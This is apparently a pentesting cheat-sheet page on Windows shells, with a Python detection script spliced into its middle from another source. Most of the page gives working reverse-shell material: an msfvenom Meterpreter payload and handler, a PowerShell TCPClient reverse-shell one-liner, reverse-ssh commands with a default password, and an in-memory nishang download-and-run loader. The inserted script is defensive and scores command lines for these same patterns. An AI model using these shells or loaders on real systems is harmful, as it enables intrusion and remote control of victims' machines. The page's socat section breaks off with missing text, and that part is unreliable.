Leet Sheet

Shells

Last updated 2 years ago
Normal Shells

Meterpreter

First, generate the file which, when executed, starts a reverse shell on the targeted host. Here's an example of an aspx shell:

msfvenom -p windows/meterpreter/reverse_tcp LHOST="10.10.14.73" LPORT=4444 -f aspx -o reverse.aspx

Then, in your attacker machine, run Metasploit and start a handler:

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LPORT 4444
set LHOST 10.10.14.73
run

Replace the port and IP address with your own ones, of course.

Interactive Powershell Reverse Shell

Caveat: stderr doesn't work!

powershell -nop -exec bypass -c "$client = New-Object System.Net.Sockets.TCPClient('IP_ADDRESS_HERE', PORT_NUMBER_HERE);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Full TTY Shells

Pwncat

Caveat: I've tested it on 2 Windows boxes in HTB, and it didn't work in either one.

Probably a good idea to switch to bash if using ZSH:

exec bash --login

If your target machine doesn't have internet access, then you'll need to download the plugins first:

pwncat --download-plugins

Listen on port 4444:

pwncat -m windows -lp 4444

Then connect to pwncat with either a powershell.exe or cmd.exe reverse shell (the IP and port in the one-liner must match the ones pwncat is listening on):

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.17',8000);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Reverse SSH Shell

Features:

  • Full TTY shell

  • File sharing via SFTP

  • Port forwarding

  • At least Windows 7 or Windows Server 2008 (Windows 10 for ConPTY; older Windows versions need a workaround for full TTY functionality)

  • Linux kernel version 2.6.23 and higher

Caveats:

  • SCP doesn't seem to work

  • SSH port forwarding doesn't seem to work

  • It hangs sometimes

Evades antivirus: Don't know

First run this on your machine:

./reverse-ssh -v -l :4444

Then the following on the victim machine (you can use the UPX-packed executable; use ssh-shellhost on older machines):

.\upx_reverse-sshx86.exe -p 4444 kali@ATTACKER_IP

And finally on your machine:

ssh -p 8888 127.0.0.1

The default password is letmeinbrudipls

NB! If the target doesn't have ConPTY (pre-Windows 10, build 17763), then you need the following workaround:

upx_reverse-sshx86.exe -p 4444 -s ssh-shellhost.exe kali@ATTACKER_IP

Rlwrap with nishang

Serve the script on your machine. Then download the nishang shell to memory:

powershell iex (New-Object Net.WebClient).DownloadString('http://IP:PORT/Invoke-PowerShellTcp.ps1');

Then run the reverse shell.

Invoke-PowerShellTcp -Reverse -IPAddress ATTACKER_IP -Port SOME_PORT
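Defender-side example, added here and not part of Leet Sheet: a small triage script that scores Windows process-creation command lines for the PowerShell reverse-shell patterns shown in this section and in the Interactive Powershell Reverse Shell section (the TCPClient/GetStream one-liner, the in-memory DownloadString loader, and the nishang Invoke-PowerShellTcp call). The sample events, their PIDs and image paths, the indicator weights and the alert threshold are all constructed assumptions for this example; the record shape loosely follows the CommandLine field of a process-creation event and is not any product's schema.

```python
"""Score process-creation command lines for PowerShell reverse-shell indicators.

Added example (not Leet Sheet's own code). Weights, threshold and sample
events are assumptions chosen to illustrate the technique.
"""
import re

# Weighted indicators: (name, compiled regex, weight). Generic hardening-bypass
# switches score low on their own; the TCP-socket and loader primitives score
# high, and a known tool name is enough to alert by itself.
INDICATORS = [
    ("noprofile",       re.compile(r"-(?:nop|noprofile)(?![\w-])", re.I), 1),
    ("exec_bypass",     re.compile(r"-(?:exec|ep|executionpolicy)\s+bypass", re.I), 1),
    ("tcpclient",       re.compile(r"System\.Net\.Sockets\.TCPClient", re.I), 4),
    ("getstream",       re.compile(r"\.GetStream\(\)", re.I), 2),
    ("iex",             re.compile(r"(?<![\w-])(?:iex|Invoke-Expression)(?![\w-])", re.I), 3),
    ("prompt_string",   re.compile(r"'PS\s*'\s*\+\s*\(pwd\)\.Path", re.I), 2),
    ("download_string", re.compile(r"\.DownloadString\(", re.I), 3),
    ("nishang_tcp",     re.compile(r"Invoke-PowerShellTcp", re.I), 5),
]
THRESHOLD = 5  # assumption: tune against your own baseline of admin scripts

# Constructed sample events (hypothetical PIDs and paths). Event 1 is the
# one-liner from the page with its placeholders filled with the page's
# example IP/port; event 3 is a benign admin script that shares two
# low-weight switches with the malicious ones.
SAMPLE_EVENTS = [
    {"pid": 4120, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'''powershell -nop -exec bypass -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.73', 4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"'''},
    {"pid": 4133, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell iex (New-Object Net.WebClient).DownloadString('http://10.10.14.73:8000/Invoke-PowerShellTcp.ps1');"},
    {"pid": 900, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -NoProfile -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"pid": 1200, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd /c dir C:\temp"},
    {"pid": 4150, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.73 -Port 4444"},
]


def score_command_line(cmdline):
    """Return (total_score, [indicator names that matched]) for one command line."""
    score, hits = 0, []
    for name, rx, weight in INDICATORS:
        if rx.search(cmdline):
            score += weight
            hits.append(name)
    return score, hits


def triage(events, threshold=THRESHOLD):
    """Return the events whose command line reaches the threshold, with evidence."""
    flagged = []
    for ev in events:
        score, hits = score_command_line(ev["cmdline"])
        if score >= threshold:
            flagged.append({"pid": ev["pid"], "image": ev["image"],
                            "score": score, "indicators": hits})
    return flagged


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(f"pid={hit['pid']} score={hit['score']} indicators={','.join(hit['indicators'])}")
```

The point of weighting rather than matching a single string is visible in the benign event: `-NoProfile -ExecutionPolicy Bypass` on its own scores 2 and stays below the threshold, while the socket primitives (`TCPClient`, `GetStream`, the `'PS ' + (pwd).Path` prompt) or a loader such as `DownloadString` plus `iex` push the one-liners well over it. In a real pipeline the same logic would run over Sysmon Event ID 1 or Security 4688 command lines, and Script Block Logging (Event ID 4104) catches the decoded script even when the command line is obfuscated.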

Socat

I think socat can be used to make a decent reverse shell?

The shellhost.exe executable needs to be in the same directory. It's an executable from .

Start a listener on SOME_PORT on the attacker machine. Use as explained here (not tested).

Requirements:

  • OpenSSH

  • rlwrap

Links:

  • Full TTYs (HackTricks)

  • Socat - How to create a windows reverse shell (Stack Overflow)

  • GitHub - Fahrj/reverse-ssh: Statically-linked ssh server with reverse shell functionality for CTFs and such

  • Shells - Windows (HackTricks)